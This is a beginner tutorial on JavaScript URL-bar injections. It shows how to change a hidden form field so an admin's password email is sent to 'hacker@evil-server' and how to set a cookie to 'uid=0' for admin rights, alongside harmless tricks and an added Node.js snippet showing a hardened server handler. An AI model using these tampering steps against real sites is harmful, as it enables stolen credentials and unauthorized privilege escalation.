Javascript injections

Javascript injections are simple to find and exploit. They're used for editing client-side data, mainly HTML forms and cookies. The only two commands that are of any use are void and alert. Alert is really simple to understand just by looking at the pop-up. Void is quite different: it's used to modify forms or cookies.

Form editing:

Now it's really simple to edit some form variables to change field names or even values. Let's imagine a page that sends the admin his password every time he clicks on a button:

<input name="email" value="admin@some-rand-host.com" type="hidden">
<input name="submit" value="Send Mail" type="submit">

Now we can see in this snippet that the main idea is to send an email to the address hard-coded in the page (admin@some-rand-host). This is where javascript comes in handy to change the target email address:

This should be written directly into the URL bar:

javascript:void(document.forms[0].email.value="hacker@evil-server")

Then we run the code by loading the URL; to view the results all you have to do is refresh the page.

Now let's understand the line:
first we run the command: javascript:void()
then we define the variable we want to change: document.forms[0].email.value.
This means that we want to modify one of the forms inside the document, namely form number 0. If it was the second form in the page then we would use: document.forms[1].email.value. Next we specify the name of the input control we want to modify, followed by the field: … email.value.
So there you have it: change the address of the recipient to your own, for example, then send the mail ;)
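The lesson for whoever runs the server is that a hidden input is just another piece of client-controlled text. The following Node.js snippet is an added example, not code from the original post: it shows a handler that takes the recipient from the form (the bug the post exploits) next to one that keeps the recipient server-side and only uses the client field to flag tampering. ADMIN_EMAIL, the handler names and the form body are assumptions matching the form above.

```javascript
// Added example (not from the original post): the hidden "email" field must
// never decide where the server sends mail. Node.js, no dependencies.
// ADMIN_EMAIL and the handler names are assumptions for this demonstration.

const ADMIN_EMAIL = 'admin@some-rand-host.com'; // server-side constant, never read from the request

// Parse an application/x-www-form-urlencoded body into a plain object.
function parseFormBody(body) {
  const fields = {};
  for (const [key, value] of new URLSearchParams(body)) fields[key] = value;
  return fields;
}

// Vulnerable handler: the recipient comes straight from the submitted form,
// so whoever edits the hidden input (as shown above) chooses the recipient.
function sendMailVulnerable(body) {
  const fields = parseFormBody(body);
  return { to: fields.email, subject: 'Your password' };
}

// Hardened handler: the recipient is fixed on the server. The client-supplied
// value is ignored for routing and only compared to detect tampering, which
// is worth logging because a browser never changes a hidden field on its own.
function sendMailHardened(body) {
  const fields = parseFormBody(body);
  const tampered = fields.email !== undefined && fields.email !== ADMIN_EMAIL;
  return { to: ADMIN_EMAIL, subject: 'Your password', tampered };
}

// Constructed request body: what the server receives after the post's
// javascript:void(...) edit and a click on "Send Mail".
const TAMPERED_BODY = 'email=hacker%40evil-server&submit=Send+Mail';

console.log(sendMailVulnerable(TAMPERED_BODY)); // recipient is hacker@evil-server
console.log(sendMailHardened(TAMPERED_BODY));   // recipient is the admin, tampered: true
```

The cleanest fix is to drop the hidden field altogether, since the server already knows the admin's address; the comparison is only there to show how an edited field can be spotted in the request log.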

Cookie editing:

Cookies are used to keep simple variables and values on the client machine (inside the temporary internet files). These cookies could be used for example to keep track of your connection status, your current theme, or in the worst cases: your user rights. Using cookies to keep track of user rights is probably the simplest way, but also the most insecure and dangerous one for the webmaster. To see the cookies that a site serves us we can use the alert command again:

javascript:alert(document.cookie)

From there we can see if there are any vulnerable fields that we might be able to inject and control. Imagine a cookie like this one:

use_theme=darkblue;user_name=hackr;uid=2;

Now you can see that the cookie actually holds the variable uid, which means that we can easily try to change its value and check out the results by running a command like this one:

javascript:void(document.cookie="uid=0")

With that line we just changed the value of uid from 2 to 0, which means that if the website treats uid 0 users as administrators then we are now admins ;) Thankfully this vulnerability, based on trusting whatever the client sends, is being found less and less in the wild.

Try these injections:

  • javascript:alert("Hello!");
    This will bring up an alert box saying "Hello!".
  • javascript:alert("Hello"); alert("World");
    This will bring up 2 alert boxes. The one in front will say "Hello" and once you click OK, the one saying "World" will appear.
  • javascript:alert(document.forms[0].to.value="something")
    This will change the value of the "to" field of form [0] to something.
  • javascript:void(document.bgColor="blue")
    This will change the background color to blue. You can put any other color in place of blue to change it to a different color.
  • javascript:alert("The actual url is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");
    This long injection will tell you the real server name of the site you are looking at. You should use it if you think that you are viewing a spoofed website, or any time just to make sure.
  • javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[i].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
    This long injection will make pictures fly around. Make sure to find a site like Google Images so there are more pictures! (If you press the refresh button it goes really fast; this might only work on a Mac.)
  • javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[i].style; DIS.position='absolute'; DIS.left=Math.cos(R*x1+i*x1+x2)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
    This is an alternate to the spinning circle of pictures. It funnels the pictures in a snake-like motion.
  • javascript:document.body.contentEditable='true';document.designMode='on';void(0)
    This injection allows you to move things around on the webpage. However, any changes you make here are not permanent, and can only be seen by you.
